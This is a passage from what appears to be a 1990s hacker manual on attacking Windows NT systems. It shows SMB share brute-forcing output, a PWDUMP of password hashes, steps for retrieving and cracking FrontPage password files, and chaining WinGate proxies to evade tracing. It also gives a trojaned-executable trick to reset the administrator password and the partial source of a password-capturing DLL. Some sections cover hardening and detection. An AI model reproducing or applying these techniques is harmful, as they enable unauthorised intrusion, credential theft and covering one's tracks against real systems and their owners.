4629C:\net use /?
4630
4631The syntax of this command is:
4632
4633NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
4634 [/USER:[domainname\]username]
4635 [[/DELETE] | [/PERSISTENT:{YES | NO}]]
4636
4637NET USE [devicename | *] [password | *]] [/HOME]
4638
4639NET USE [/PERSISTENT:{YES | NO}]
4640
4641C:\net use x: \\XXX.XX.XXX.XX\test
4642
4643The command completed successfully.
4644
4645C:\unzipped\nat10bin>net use
4646
4647New connections will be remembered.
4648
4649Status Local Remote Network
4650
4651-------------------------------------------------------------------------------
4652OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
4653OK \\XXX.XX.XXX.XX\test Microsoft Windows Network
4654
4655The command completed successfully.
4656
4657Here is an actual example of how the NAT.EXE program is used. The information listed here is
4658an actual capture of the activity. The IP addresses have been changed to protect, well, us.
4659
4660C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
4661
4662
4663[*]--- Reading usernames from userlist.txt
4664[*]--- Reading passwords from passlist.txt
4665
4666[*]--- Checking host: XXX.XX.XXX.XX
4667[*]--- Obtaining list of remote NetBIOS names
4668
4669[*]--- Attempting to connect with name: *
4670[*]--- Unable to connect
4671
4672[*]--- Attempting to connect with name: *SMBSERVER
4673[*]--- CONNECTED with name: *SMBSERVER
4674[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
4675[*]--- Server time is Mon Dec 01 07:44:34 1997
4676[*]--- Timezone is UTC-6.0
4677[*]--- Remote server wants us to encrypt, telling it not to
4678
4679[*]--- Attempting to connect with name: *SMBSERVER
4680[*]--- CONNECTED with name: *SMBSERVER
4681[*]--- Attempting to establish session
4682[*]--- Was not able to establish session with no password
4683[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
4684[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
4685
4686[*]--- Obtained server information:
4687
4688Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
4689
4690[*]--- Obtained listing of shares:
4691
4692 Sharename Type Comment
4693 --------- ---- -------
4694 ADMIN$ Disk: Remote Admin
4695 C$ Disk: Default share
4696 IPC$ IPC: Remote IPC
4697 NETLOGON Disk: Logon server share
4698 Test Disk:
4699
4700[*]--- This machine has a browse list:
4701
4702 Server Comment
4703 --------- -------
4704 STUDENT1
4705
4706
4707[*]--- Attempting to access share: \\*SMBSERVER\
4708[*]--- Unable to access
4709
4710[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
4711[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
4712[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
4713[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
4714[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
4715
4716[*]--- Attempting to access share: \\*SMBSERVER\C$
4717[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
4718[*]--- Checking write access in: \\*SMBSERVER\C$
4719[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
4720[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
4721
4722[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
4723[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
4724[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
4725[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
4726
4727[*]--- Attempting to access share: \\*SMBSERVER\Test
4728[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
4729[*]--- Checking write access in: \\*SMBSERVER\Test
4730[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
4731
4732[*]--- Attempting to access share: \\*SMBSERVER\D$
4733[*]--- Unable to access
4734
4735[*]--- Attempting to access share: \\*SMBSERVER\ROOT
4736[*]--- Unable to access
4737
4738[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
4739[*]--- Unable to access
4740
4741If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If
4742not, keep playing. You will be surprised what you find out.
4743
4744[9.0.0] Frontpage Extension Attacks
4745
4746Ofcourse, everyone should know what Microsoft Frontpage is. The server extensions are installed
4747server side to provide added functionality for frontpage web authors. These extensions function
4748as “web bots†if you will, giving web authors that use frontpage easy access to complex web and
4749HTML functions. Soon after the extensions came into wide use, security concerns began to pop-
4750up. Most of these security concerns were very basic, the collection presented below are PROVEN
4751methods that have been tested repeatedly in several types of configurations.
4752
4753[9.0.1] For the tech geeks, we give you an actual PWDUMP
4754
4755This is the pwdump from the webserver the Lan Manager password is set to "password". This
4756PWDUMP example is for those of you that have heard about the utility but may have never
4757actually seen the output of one. This dump was used by Vacuum of rhino9 during his journey into
4758cracking the NT encryption algorithm.
4759
4760Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD83
47610B7586C:Built-in account for administering the computer/domain::
4762Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in
4763account for guest access to the computer/domain::
4764STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE4050
47653127253:::
4766ketan:1005:********************************:********************************:::
4767mari:1006:********************************:********************************:::
4768meng:1007:********************************:********************************:::
4769IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0
4770A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
4771
4772[9.0.2] The haccess.ctl file
4773
4774The hacces.ctl file is sometimes called a shadow password file, well, this is not exactly correct.
4775The file can give you a lot of information, including the location of the service password file. A
4776complete example of the haccess.ctl file is given below:
4777
4778The #haccess.ctl file:
4779
4780# -FrontPage-
4781
4782Options None
4783
4784<Limit GET POST PUT>
4785order deny,allow
4786deny from all
4787</Limit>
4788AuthName default_realm
4789AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
4790AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
4791
4792Executing fpservwin.exe allows frontpage server extensions to be installed on
4793
4794port 443 (HTTPS)Secure Sockets Layer
4795port 80 (HTTP)
4796
4797NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used
4798instead of Frontpage.
4799
4800The following is a list of the Internet Information server files location
4801in relation to the local hard drive (C:) and the web (www.target.com)
4802
4803C:\InetPub\wwwroot <Home>
4804C:\InetPub\scripts /Scripts
4805C:\InetPub\wwwroot\_vti_bin /_vti_bin
4806C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
4807C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
4808C:\InetPub\cgi-bin /cgi-bin
4809C:\InetPub\wwwroot\srchadm /srchadm
4810C:\WINNT\System32\inetserv\iisadmin /iisadmin
4811C:\InetPub\wwwroot\_vti_pvt
4812FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For
4813each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the
4814FrontPage web that the access file points to:
4815service.pwd contains the list of users and passwords for the FrontPage web.
4816service.grp contains the list of groups (one group for authors and one for administrators in
4817FrontPage).
4818On Netscape servers, there are no service.grp files. The Netscape password files are:
4819administrators.pwd for administrators
4820authors.pwd for authors and administrators
4821users.pwd for users, authors, and administrators
4822
4823C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
4824If Index Information Server is running under Internet Information Server:
4825service.pwd (or any other file) can sometimes be retrieved.
4826search for
4827"#filename=*.pwd"
4828
4829C:\Program Files\Microsoft FrontPage\_vti_bin
4830C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
4831C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
4832C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin
4833
4834C:\InetPub\ftproot The default location for the ftp
4835
4836The ftp service by default runs on the standard port 21.
4837Check to see if anonymous connections are allowed. By default, Internet Information Server
4838creates and uses the account IUSR_computername for all anonymous logons. Note that the
4839password is used only within Windows NT ; anonymous users do not log on using this user name
4840and password.
4841
4842Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail
4843address as the password. The FTP service then uses the IUSR_computername account as the
4844logon account for permissions. When installed, Internet Information Server’s Setup created the
4845account IUSR_computername in the Windows NT User Manager for Domains and in Internet
4846Service Manager. This account was assigned a random password for both in Internet Service
4847Manager and in the Windows NT User Manager for Domains. If changed, the password, you must
4848change it in both places and make sure it matches.
4849
4850NOTE: Name and password are case sensitive
4851Scanning PORT 80 (http) or 443 (https) options:
4852GET /__vti_inf.html #Ensures that frontpage server extensions
4853 are installed.
4854GET /_vti_pvt/service.pwd #Contains the encrypted password files.
4855 Not used on IIS and WebSite servers
4856GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted
4857 names and passwords of authors.
4858GET /_vti_pvt/administrators.pwd
4859GET /_vti_log/author.log #If author.log is there it will need to
4860 be cleaned to cover your tracks
4861
4862GET /samples/search/queryhit.htm
4863
4864If service.pwd is obtained it will look similar to this:
4865
4866Vacuum:SGXJVl6OJ9zkE
4867
4868The above password is apple
4869Turn it into DES format:
4870
4871Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
4872
4873[9.0.3] Side note on using John the Ripper
4874
4875The run your favorite unix password cracker like John The Ripper
4876
4877Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
4878
4879Flags: -pwfile:<file>[,..] specify passwd file(s) (wildcards allowed)
4880 -wordfile:<file> specify wordlist file
4881 -restore[:<file>] restore session [from <file>]
4882 -user:login|uid[,..] only crack this (these) user(s)
4883 -timeout:<time> abort session after a period of <time> minutes
4884 -incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>]
4885 -single single crack mode
4886 -stdin read words from stdin
4887 -list list each word
4888 -test perform a benchmark
4889 -beep beep when a password is found
4890 -quiet do not beep when a password is found (default)
4891 -noname don't use memory for login names
4892
4893Other ways of obtaining service.pwd
4894http://ftpsearch.com/index.html
4895search for service.pwd
4896http://www.alstavista.digital.com
4897advanced search for link:"/_vti_pvt/service.pwd"
4898
4899To open a FrontPage web
4900
4901On the FrontPage Explorer’s File menu, choose Open FrontPage Web.
4902In the Getting Started dialog box, select Open an Existing FrontPage
4903Web and choose the FrontPage web you want to open.
4904Click More Webs if the web you want to open is not listed.
4905Click OK.
4906If you are prompted for your author name and password, you will have
4907to decrypt service.pwd, guess or move on.
4908Enter them in the Name and Password Required dialog box, and click OK.
4909Alter the existing page, or upload a page of your own.
4910
4911[10.0.0] WinGate
4912
4913There have been a few papers about WinGate. Some have explained how to bounce through its
4914port 23 telnet proxy. Some have explained how to secure it. In this section we will show you how
4915to use WinGate for its good and bad and you will learn from the good and bad examples. People
4916in the past have said there are flaws and exploits to WinGates and this is wrong. There are
4917system admins that poorly configure their systems but it is not WinGate itself that is the flaw.
4918
4919[10.0.1] What Is WinGate?
4920
4921WinGate is basically a program that lets you split a connection. Ex: You can share 1 modem with
49222 computers. WinGate comes with several proxies and that is where the possible threat lies. (This
4923sharing of internet connection is known as Connection Aggregation)
4924
4925Note: We will only talk about 3 of the more used proxy portions of WinGate.
4926
4927[10.0.2] Defaults After Install
4928
4929When you do a regular install of WinGate without changing things there are a few defaults:
4930Port: | Service:
493123 Telnet Proxy Server - This is default and running right after install.
49321080 SOCKS Server - This once setup via GateKeeper has no password until you set one.
49336667 IRC Mapping - This once setup via GateKeeper has no password until you set one.
4934
4935The biggest threat to your server is the port 23 telnet proxy.
4936
4937[10.0.3] Port 23 Telnet Proxy
4938
4939This proxy is setup and run as soon as you are done installing and to make things worse it has no
4940password after install and doesn’t ask you for one. Most system admins dont even know this and
4941dont even think to try to password it and that is where the problem arises.
4942
4943The telnet proxy is quiet simple. You telnet to port 23 on the server that is running the WinGate
4944telnet proxy and you get a prompt WinGate> At this prompt you type in the server then a space
4945and the port you want to connect to.
4946
4947Example:
4948telnet wingate.net
4949Connected to wingate.net
4950
4951WinGate> victim.com 23
4952
4953What this example shows is someone telnetting to the WinGate server and then from that
4954WinGate server telnet out of it to victim.com so on victim.com's logs it will show the wingate IP
4955(wingate.net) and therefore the person telnetting keeps her IP a secret.
4956
4957[10.0.4] Port 1080 SOCKS Proxy
4958
4959The socks proxy is not installed by default but as soon as you use GateKeeper to install it. It
4960installs with no password, unless you set one. If you are familiar with socks you know that there
4961are many things you could do with it.
4962
4963[10.0.5] Port 6667 IRC Proxy
4964
4965The irc proxy is like how we would do a wingate telnet proxy bounce to an irc server except the irc
4966proxy is set to goto a certain server already. This is not set to run after install but after you do
4967install it it setups with no password, unless you set one.
4968
4969[10.0.6] How Do I Find and Use a WinGate?
4970
4971Finding WinGates are relatively easy to do. If you would like to find static IP WinGates (IP never
4972changes) go to yahoo or something of the such and search for cable modems. The reason for
4973searching for cable modems is because a lot of people with cable modems have WinGate so that
4974they can split there cable modems large bandwidth and share it with the other computers in there
4975house. One large cable modem company is Cox Cable. Their webpage can be found at
4976www.home.com. The Cox Cable rang of IP's are: 24.1.X.X where depending on what number X
4977equals is where in the country the cable modem is located. You can also use Port or Domain
4978scanners and scan for Port 1080, which Identifies a SOCKS Proxy, this is also an easy way to
4979find a WinGate.
4980
4981Example:
498224.1.67.1 Resolves to c224084-a.frmt1.sfba.home.com which from that we know the abreveation
4983sfba = San Fransico Bay Area or something close to that.
4984That is how to find static IP WinGates. To find dynamic IP (IP's that change every time a user
4985logs on to the internet) WinGates it is not to hard at all. Almost every ISP big and small has users
4986with WinGate. You need to either know the format of an ISP's dynamic ppp addresses or you
4987need to get on IRC (Internet Relay Chat) and see what they are that way. Say that you already
4988have a ppp IP of armory-us832.javanet.com. Now you dns that IP and get 209.94.151.143 now
4989you take the IP address and stick it into a domain scanner program. Ex: Domscan which can be
4990found on the Rhino9 web site (rhino9.abyss.com) Ok so you have domscan now. Run domscan
4991and there is a box where you put in the IP address and the port to scan for. The WinGate telnet
4992proxy by default runs on port 23. So we put in 209.94.151.143 in the first box in the domscan
4993program and then 23 in the second box and then click start. The results we will get are:
4994
4995209.94.151.2
4996209.94.151.4
4997209.94.151.6
4998209.94.151.10
4999209.94.151.8
5000209.94.151.73
5001209.94.151.118
5002209.94.151.132
5003
5004Now we have to check each of these IP's for the WinGate prompt. So to do that we need to telnet
5005to 209.94.151.2 on port 23 and if it shows WinGate> right when we connect then it is a WinGate.
5006If not we go to the next address which in this case would be 209.94.151.4. We would do that for
5007the whole list of IP's.
5008
5009Note: If we are scanning for dynamic IP WinGates it is more common that the last number of the
5010IP of the WinGate will be higher. Ex: There is a better chance that 209.94.151.132 is a WinGate
5011and that 209.94.151.2 is not a WinGate.
5012
5013[10.0.7] I have found a WinGate telnet proxy now what?
5014
5015Well there are many uses for WinGate. The first use and probably the greatest is the WinGate
5016bounce technique. Say you are going to hack the pentagon. You can use the WinGate technique
5017to keep yourself from having a jail sentence with spike. Here is how it works. We get a collection
5018of WinGate IP's. First we open our telnet program and telnet to the first WinGate on our list. We
5019get the WinGate> prompt and at that prompt we type the second WinGate on our list then a
5020space then 23 then hit enter. Then we get another WinGate prompt and at that prompt we type
5021the third WinGate IP on our list then a space then 23 then enter and so on and so fourth until we
5022have bounced through about 10 or so WinGates then on the tenth WinGate we enter in the
5023pentagon addresss. Ex: WinGate> www.pentagon-ai.army.gov 23 and then hit enter and start
5024hacking away at it. So you ask, well cant they just trace back through all the WinGates? They
5025could try to trace it back and here is how it would work. The pentagon has an IP on there logs, the
5026ip is 2.2.2.2. The pentagon know that IP belongs to the an internet service provider called
5027interlink. So the pentagon calls interlink and then tells them that at 3:43am on sunday an ip
5028address of 2.2.2.2 hacked into there computer system. So the ISP (internet service provider)
5029checks there logs and sees that there user John Doe was on at that time with that IP on sunday.
5030So the pentagon has the swat team do a raid on John Doe's house and find nothing. Now it could
5031end right here or the pentagon will maybe see that John Doe has WinGate and then check his
5032logs. Now most people with WinGate dont even log so the pentagon could be stumped right there
5033once again or they might see that another IP went through that WinGate and then they will have
5034to repeat the process of calling the ISP and repeat that whole process again. Now if we went
5035through 10 WinGate IP's you know that somewhere in that 10 either the ISP or the WinGate user
5036wont know what IP was going through them, in otherwords if you bounce through 10 WinGate
5037IP's you are a ghost, thy samurai... That is one use of WinGate's telnet proxy. Note: you might
5038need to do a control + enter at the WinGate> prompt, it differs between telnet clients. Another use
5039can be for IRC spoofing. To do this we take a WinGate ip and in our irc client we connect to that
5040WinGate IP. This is an example of how it would look in mIRC for Windows. Do these commands:
50411. /server wingate.net
5042It then connects.
50432. /quote irc.irc.net 6667
5044It then connects to the irc server.
50453. /quote user whatever whatever whatever@server.com whatever
50464. /quote nick whatever
5047This sends the irc client info. Read the irc rfc for more info on that.
5048Once we have done /quote nick whatever mirc will be totally connected and we can then do
5049whatever we want and our IP on IRC will be wingate.net or whatever the wingate IP is. So think
5050about it and I am sure you can think of a few fun things to do with someone elses IP. Note: For
5051you people that choose to abuse this. I have already coded an anti-wingate script for IRC to
5052detect you mean people that choose to abuse this.
5053Those are 2 of the more common things to do with WinGate telnet proxies.
5054
5055[10.0.8] Securing the Proxys
5056
5057Service That Need To Be Locked To Stop Bouncing
5058
505923 - Telnet Proxy Server
50601080 - SOCKS Server
50616667 - IRC Mapping
5062
5063All Ports Can Be Locked The Same Way
5064
50651- Load Gatekeeper
50662- Logon To Wingate Server As Administrator
50673- Select Service To Lock
50684- Right Click And Pick Properties
50695- Option One Of Lock Down Is Click "Bind to specific interface" and put 127.0.0.1 in the box
50706- Other Way To Lock Down A Service Is Select Policies, Double Click on "Everyone
5071Unrestricted Rights", Click on Location Tab, Click on "Specify locations from where this
5072recipient has rights" next you will be entering the IP(s) you what to give access to this service
5073(Add 127.0.0.1 so the local box has access) you can add by each IP or by groups of IPs like
5074199.170.0. *
5075
5076Some Other Notes Guest Account Has No Password and Enable on Install Basic Install Let's
5077EVERONE have access to bounce from your system. All ports but the "remote control service" is
5078unlocked and everyone has access, you should turn off any services you do not have a need for
5079by double clicking on the service and unchecking the "Accept connections on port"
5080
5081[10.0.9] mIRC 5.x WinGate Detection Script
5082
5083Note: This is script will kick/ban anyone running WinGate.
5084
5085alias telnet .msg $me $chr(1) $+ DCC CHAT CHAT $longip($$1) $$2 $+ $chr(1)
5086alias removenickcheck unset %lastjoined $nick
5087alias gatekick {
5088 set %nick $$1
5089 set %chan 0
5090 :loop2
5091 inc %chan 1
5092 if (%nick ison $chan(%chan)) {
5093 mode $chan(%chan) -o %nick
5094 ban $chan(%chan) %nick 2
5095 kick $chan(%chan) %nick -=_Wingate Spoof_=-
5096 goto loop2
5097 }
5098 if ($chan(%chan) == $null) { goto end2 }
5099 goto loop2
5100 :end2
5101 unset %nick
5102}
5103#spoofcheck on
5104on 1:JOIN:%protchans:set %gatenick $nick | set %lastjoined $nick | timer 1 3 removenickcheck |
5105write $mircdirips.txt %gatenick --> $site <-- [ $time, $date ] | dns $nick
5106on 1:DNS:echo -a _DNS ON [ $+ $nick $+ ]] | echo -a _IP address: $iaddress | echo -a _Name
5107address: $naddress | set %gateip $iaddress | set %gatename $naddress | telnet %gateip 23 |
5108timer66 1 15 close -c
5109on 1:CHATOPEN:msg =$nick gatecheck | timer66 1 15 close -c
5110on 1:CHAT:*WinGate>*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gateip
5111on 1:CHAT:*many*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gateip
5112#spoofcheck end
5113#gateslip on
5114on 1:NICK:{
5115 if ($nick == %lastjoined) && ($nick != $me) {
5116 echo 4 -a (-=_GateSlip Check_=-)
5117 kick %protchans $newnick -=_GateSlip_=-
5118 removenickcheck
5119 }
5120}
5121#gateslip end
5122
5123[10.1.0] Conclusion
5124
5125WinGate is just another example of a program that is good but it doesnt warn the system admins
5126and as we all know the common system admin doesnt read much just installs thinking it is secure.
5127Software programmers need to either make their programs default to a tight security or at least as
5128the program is install they need it to warn the system admin of possible miss configurations.
5129Wether it is Microsoft products or this simple WinGate remember one thing, the software
5130developer makes the software work they rarely ever warn you on miss configurations. Yes people
5131do put out patches for true exploits etc... but where are the papers on miss configurations? Where
5132are the warnings of things you might do that you should? If I was one of the WinGate
5133programmers I would prompt the user while WinGate is installing and tell them of different
5134security risks they may face. Hope that this paper has helped and that we, Rhino9, have helped.
5135
5136[11.0.0] What a security person should know about WinNT
5137
5138 The basis for this portion of the book was gleaned from simple nomads FAQ, much Props to
5139him.
5140
5141[11.0.1] NT Network structures (Standalone/WorkGroups/Domains)
5142
5143Each NT workstation participates in either a workgroup or a domain. Most companies will have
5144NT workstations participate in a domain for management of the resource by the administrator.
5145
5146A domain is one or more servers running NT server with all of the servers functioning as a single
5147system. The domain not only contains servers, but NT workstations, Windows for Workgroups
5148machines, and even LAN Manager 2.x machines. The user and group database covers ALL of
5149the resources of a domain.
5150
5151Domains can be linked together via trusted domains. The advantage of trusted domains is that a
5152user only needs one user account and password to get to resources across multiple domains,
5153and administrators can centrally manage the resources.
5154
5155A workgroup is simply a grouping of workstations that do not belong to a domain. A standalone
5156NT workstation is a special case workgroup.
5157
5158User and group accounts are handled differently between domain and workgroup situations. User
5159accounts can be defined on a local or domain level. A local user account can only logon to that
5160local computer, while a domain account can logon from any workstation in the domain.
5161
5162Global group accounts are defined at a domain level. A global group account is an easy way to
5163grant access to a subset of users in a domain to, say, a single directory or file located on a
5164particular server within the domain. Local group accounts are defined on each computer. A local
5165group account can have global group accounts and user accounts as members.
5166
5167In a domain, the user and group database is "shared" by the servers. NT workstations in the
5168domain DO NOT have a copy of the user and group database, but can access the database. In a
5169workgroup, each computer in the workgroup has its own database, and does not share this
5170information.
5171
5172[11.0.2] How does the authentication of a user actually work?
5173
5174First, a user logs on. When this happens, NT creates a token object that represents that user.
5175Each process the user runs is associated with this token (or a copy of it). The token-process
5176combination is refered to as a subject. As subjects access objects such as files and directories,
5177NT checks the subject's token with the Access Control List (ACL) of the object and determines
5178whether to allow the access or not. This may also generate an audit message.
5179
5180[11.0.3] A word on NT Challenge and Response
5181
5182 When a user logs on, more than likely they will be using Windows NT Challenge and Response.
5183When using this type of password encryption, the password never actually crosses the wire. A
5184null or random set of characters is generated at the client machine. Those characters are
5185encrypted using the users password. That encrypted information is then sent across the wire. The
5186server then uses what it has stored in its database as the users password to un-encrypt the sent
5187data. If the un-encryption works, it knows that the user typed in the correct password client side.
5188
5189[11.0.4] Default NT user groups
5190
5191There are a number of built-in local groups in NT that can do various functions, some which
5192would be better off being left to the Administrator. Administrators can do everything, but the
5193following groups' members can do a few extra items (I only verified this on 4.0):
5194
5195- Server Operators: do a shutdown, even remotely; reset the system time; perform backups and
5196restores.
5197- Backup Operators: do a shutdown; perform backups and restores.
5198- Account Operators: do a shutdown.
5199- Print Operators: do a shutdown.
5200
5201Also members of these groups can login at the console. As you explore this book and possibly
5202someone else's server, remember these permissions. Gaining a Server Operator account and
5203placing a trojan that activates after a remote shutdown could get you Administrator.
5204
5205[11.0.5] Default directory permissions
5206
5207I only verified these on 4.0. And remember, Administrators are deities. Otherwise, if it isn't here,
5208the group doesn't have access.
5209
5210\ (root), \SYSTEM32, \WIN32APP - Server Operators and Everyone can read and execute files,
5211display permissions on files, and do some changing on file attributes.
5212
5213\SYSTEM32\CONFIG - Everyone can list filenames in this directory.
5214
5215\SYSTEM32\DRIVERS, \SYSTEM\REPL - Server Operators have full access, Everyone has read
5216access.
5217
5218\SYSTEM32\SPOOL - Server Operators and Print Operator have full access, Everyone has read
5219access.
5220
5221\SYSTEM32\REPL\EXPORT - Server Operators can read and execute files, display permissions
5222on files, and do some changing on file attributes. Replicator has read access.
5223
5224\SYSTEM32\REPL\IMPORT - Server Operators and Replicator can read and execute files,
5225display permissions on files, and do some changing on file attributes. Everyone has read access.
5226
5227\USERS - Account Operators can read, write, delete, and execute. Everyone can list filenames in
5228this directory.
5229
5230\USERS\DEFAULT - Everyone has read, write, and execute.
5231
5232[11.0.6] Common NT accounts and passwords
5233
5234There are two accounts that come with NT out of the box – administrator and guest. In a network
5235environment, I have run into local administrator access unpassworded, since the Sys Admin
5236thought that global accounts ruled over local ones. Therefore it is possible to gain initial access to
5237an NT box by using its local administrator account with no password.
5238
5239Guest is another common unpassworded account, although recent shipments of NT disable the
5240account by default. While it is possible that some companies will delete the guest account, some
5241applications require it. If Microsoft Internet Studio needs to access data on another system, it
5242will use guest for that remote access.
5243
5244[11.0.7] How do I get the admin account name?
5245
5246It is possible that a Sys Admin will create a new account, give that account the same access as
5247an administrator, and then remove part of the access to the administrator account. The idea here
5248is that if you don't know the administrator account name, you can't get in as an administrator.
5249
5250Typing "NBTSTAT -A ipaddress" will give you the new administrator account (generally tagged as
5251a 2 digit 03 code), assuming they are logged in. A bit of social engineering could get them to log
5252in as well. nbtstat will also give you other useful information such as services running, the NT
5253domain name, the nodename, and the ethernet hardware address.
5254
5255[11.0.8] Accessing the password file in NT
5256
5257The location of what you need is in \\WINNT\SYSTEM32\CONFIG\SAM which is the location of
5258the security database. This is usually world readable by default, but locked since it is in use by
5259system compotents. It is possible that there are SAM.SAV files which could be readable. If so,
5260these could be obtained for the purpose of getting password info.
5261
5262During the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it
5263was just installed, only the Administrator and Guest accounts will be there, but maybe
5264Administrator is enough -- especially if the Administrator password is not changed after
5265installation.
5266
5267If the Sys Admin updates their repair disks, or you get a hold of a copy of the repair disks, you
5268can get password database.
5269
5270If you are insane, you can go poking around in the SAM secret keys. First, schedule service to
5271logon as LocalSystem and allow it to interact with the desktop, and then schedule an interactive
5272regedt32 session. The regedt32 session will be running as LocalSystem and you can play around
5273in the secret keys. However, if you change some stuff this might be very bad. You have to be
5274Administrator to do this, though, so for the hacker you need to walk up to the machine while the
5275Administrator is logged in and distract them by telling them they're giving away Microsoft t-shirts
5276in the lobby (this doesn't always work ;-).
5277
5278[11.0.9] Cracking the NT passwords
5279
5280First off, it should be explained that the passwords are technically not located on the server, or in
5281the password database. What IS located there is a one-way hash of the password. Let me
5282explain...
5283
5284Two one-way hashes are stored on the server -- a Lan Manager password, and a Windows NT
5285password. Lan Manager uses a 14 byte password. If the password is less than 14 bytes, it is
5286concantenated with 0's. It is converted to upper case, and split into 7 byte halves. An 8 byte odd
5287parity DES key is constructed from each 7 byte half. Each 8 byte DES key is encrypted with a
5288"magic number" (0x4B47532140232425 encrypted with a key of all 1's). The results of the magic
5289number encryption are concantenated into a 16 byte one way hash value. This value is the Lan
5290Manager "password".
5291
5292A regular Windows NT password is derived by converting the user's password to Unicode, and
5293using MD4 to get a 16 byte value. This hash value is the NT "password".
5294
5295So to crack NT passwords, the username and the corresponding one way hashes (Lan Man and
5296NT) need to be extracted from the password database. Instead of going out and writing some
5297code to do this, simply get a copy of Jeremy Allison's PWDUMP, which goes through SAM and
5298gets the information for you.
5299
5300PWDUMP does require that you are an Administrator to get stuff out of the registry, but if you can
5301get ahold of copies of the security database from another location you can use those. For actually
5302cracking the password, I recommend using L0phtcrack.
5303
5304[11.1.0] What is ‘last login time’?
5305
5306Let's say an admin is checking the last time certain users have logged in by doing a NET USER
5307<userid> /DOMAIN. Is the info accurate? Most of the time it will NOT be.
5308
5309Most users do not login directly to the Primary Domain Controller (PDC), they login to a Backup
5310Domain Controller (BDC). BDCs do NOT contain readonly versions of SAM, they contain read-
5311write versions. To keep the already ungodly amount of network traffic down, BDCs do not tell the
5312PDC that they have an update of the last login time until a password change has been done. And
5313the NET USER <userid> /DOMAIN command checks the PDC, so last login time returned from
5314this command could be wildly off (it could even show NEVER).
5315
5316As a hacker, if you happen to know that password aging is not enforced, then you can bet that
5317last login times will probably not be very accurate.
5318
5319[11.1.1] Ive got Guest access, can I try for Admin?
5320
5321Basic NT 3.51 has some stuff read/writeable by default. You could edit the association between
5322an application and the data file extension using regedt32. First off, you should write a Win32 app
5323that does nothing but the following -
5324
5325 net user administrator biteme /y
5326 notepad %1 %2 %3 %4 %5
5327
5328In a share you have read/write access to, upload it. Now change the association between .txt files
5329and notepad to point to the location of the uploaded file, like
5330
5331\\ThisWorkstation\RWShare\badboy.exe.
5332
5333Now wait for the administrator to launch a text file by double clicking on it, and the password
5334becomes "biteme".
5335
5336Of course, if the Sys Admin is smart they will have removed write permission from Everyone for
5337HKEY_CLASSES_ROOT, only giving out full access to creator\owner.
5338
5339[11.1.2] I heard that the %systemroot%\system32 was writeable?
5340
5341Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory.
5342This file typically exists in a Netware environment. First compile this exploit code written by
5343Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the
5344user names and passwords to get written to a file in \temp.
5345
5346------------- cut --------------
5347#include <windows.h>
5348#include <stdio.h>
5349#include <stdlib.h>
5350
5351struct UNI_STRING {
5352 USHORT len;
5353 USHORT maxlen;
5354 WCHAR *buff;
5355 };
5356
5357static HANDLE fh;
5358
5359BOOLEAN __stdcall InitializeChangeNotify ()
5360{
5361 DWORD wrote;
5362 fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
5363 FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
5364 FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
5365 0);
5366 WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
5367 return TRUE;
5368}
5369
5370LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
5371 struct UNI_STRING *passwd)
5372{
5373 DWORD wrote;
5374 WCHAR wbuf[200];
5375 char buf[512];
5376 char buf1[200];
5377 DWORD len;
5378
5379 memcpy(wbuf, user->buff, user->len);
5380 len = user->len/sizeof(WCHAR);
